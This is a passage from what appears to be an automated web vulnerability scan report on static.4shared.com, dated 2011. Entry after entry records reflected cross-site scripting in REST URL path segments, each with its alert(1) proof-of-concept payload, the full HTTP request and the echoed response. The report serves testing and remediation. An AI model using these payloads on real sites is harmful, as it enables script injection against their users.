<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16f7aec"-alert(1)-"b86c9662edb/close.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.420. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad02c"-alert(1)-"a953950d00e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons/16x16/close.gifad02c"-alert(1)-"a953950d00e HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16/close.gifad02c&quot;-alert(1)-&quot;a953950d00e
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=03A457731FAEC3860D53C42B8811E941.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:37 GMT
Content-Length: 36254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16/close.gifad02c"-alert(1)-"a953950d00e";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.421. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 760a5"-alert(1)-"158d4163382 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images760a5"-alert(1)-"158d4163382/icons/16x16/stop.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images760a5&quot;-alert(1)-&quot;158d4163382/icons/16x16/stop.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D6DADEDB0265DD419843A49CE2D04781.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:11 GMT
Content-Length: 36249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images760a5"-alert(1)-"158d4163382/icons/16x16/stop.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedba
...[SNIP]...

3.422. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73080"-alert(1)-"bd5e5c0b567 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons73080"-alert(1)-"bd5e5c0b567/16x16/stop.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons73080&quot;-alert(1)-&quot;bd5e5c0b567/16x16/stop.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=78DFFF9C129B528E44FF3EABA7D2E061.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:17 GMT
Content-Length: 36249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons73080"-alert(1)-"bd5e5c0b567/16x16/stop.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

3.423. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b306f"-alert(1)-"f931fa8a6ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons/16x16b306f"-alert(1)-"f931fa8a6ff/stop.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16b306f&quot;-alert(1)-&quot;f931fa8a6ff/stop.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C523391335A36A28DA2975087B407E0D.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:23 GMT
Content-Length: 36249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16b306f"-alert(1)-"f931fa8a6ff/stop.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.424. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34543"-alert(1)-"e3036abd11 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons/16x16/stop.gif34543"-alert(1)-"e3036abd11 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16/stop.gif34543&quot;-alert(1)-&quot;e3036abd11
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6DA068FC8810374C5C44DC7CA61476B5.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:29 GMT
Content-Length: 36244


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16/stop.gif34543"-alert(1)-"e3036abd11";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.425. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d12c3"-alert(1)-"47c5b2bb8a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesd12c3"-alert(1)-"47c5b2bb8a7/icons/misc/upload.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /imagesd12c3&quot;-alert(1)-&quot;47c5b2bb8a7/icons/misc/upload.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E8D748AE8041A79D72ED23919C2AEE58.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:11 GMT
Content-Length: 36254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/imagesd12c3"-alert(1)-"47c5b2bb8a7/icons/misc/upload.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

3.426. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e2cc"-alert(1)-"2ebb09db008 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons9e2cc"-alert(1)-"2ebb09db008/misc/upload.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons9e2cc&quot;-alert(1)-&quot;2ebb09db008/misc/upload.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CE99907F2C97B1C657CAD61A79B27113.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:17 GMT
Content-Length: 36254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons9e2cc"-alert(1)-"2ebb09db008/misc/upload.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

3.427. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e87a8"-alert(1)-"2d8bde7f418 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons/misce87a8"-alert(1)-"2d8bde7f418/upload.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/misce87a8&quot;-alert(1)-&quot;2d8bde7f418/upload.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=64D6C4F34E3F9C45C1E0317EB44FE0FF.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:23 GMT
Content-Length: 36254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/misce87a8"-alert(1)-"2d8bde7f418/upload.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.428. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a755"-alert(1)-"4ac0d6a008 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons/misc/upload.gif2a755"-alert(1)-"4ac0d6a008 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/misc/upload.gif2a755&quot;-alert(1)-&quot;4ac0d6a008
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E5DB1FF8F3B4EA16522E1274F52FB585.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:28 GMT
Content-Length: 36238


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/misc/upload.gif2a755"-alert(1)-"4ac0d6a008";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.429. http://static.4shared.com/images/ipic.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/ipic.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f14c"-alert(1)-"566c054463f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images3f14c"-alert(1)-"566c054463f/ipic.jpg HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images3f14c&quot;-alert(1)-&quot;566c054463f/ipic.jpg
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BEA4F5F1AC669555A6514786824F1450.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:49 GMT
Content-Length: 36189


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images3f14c"-alert(1)-"566c054463f/ipic.jpg";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.430. http://static.4shared.com/images/ipic.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/ipic.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20b4f"-alert(1)-"94dac4f1560 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/ipic.jpg20b4f"-alert(1)-"94dac4f1560 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/ipic.jpg20b4f&quot;-alert(1)-&quot;94dac4f1560
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5BAF51C7A76C26D994BA2C87560631AE.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:55 GMT
Content-Length: 36189


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/ipic.jpg20b4f"-alert(1)-"94dac4f1560";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.431. http://static.4shared.com/js/dw_drag.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_drag.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79778"-alert(1)-"1c264739c21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js79778"-alert(1)-"1c264739c21/dw_drag.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js79778&quot;-alert(1)-&quot;1c264739c21/dw_drag.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FA91D5B32A64AEF6FE6CA52D10425C19.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:23 GMT
Content-Length: 36149


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js79778"-alert(1)-"1c264739c21/dw_drag.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.432. http://static.4shared.com/js/dw_drag.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_drag.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf87f"-alert(1)-"6f121a1eda2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/dw_drag.jsbf87f"-alert(1)-"6f121a1eda2?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_drag.jsbf87f&quot;-alert(1)-&quot;6f121a1eda2
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BF6758CFC672FC39672A2E95C372AAFE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:27 GMT
Content-Length: 36160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
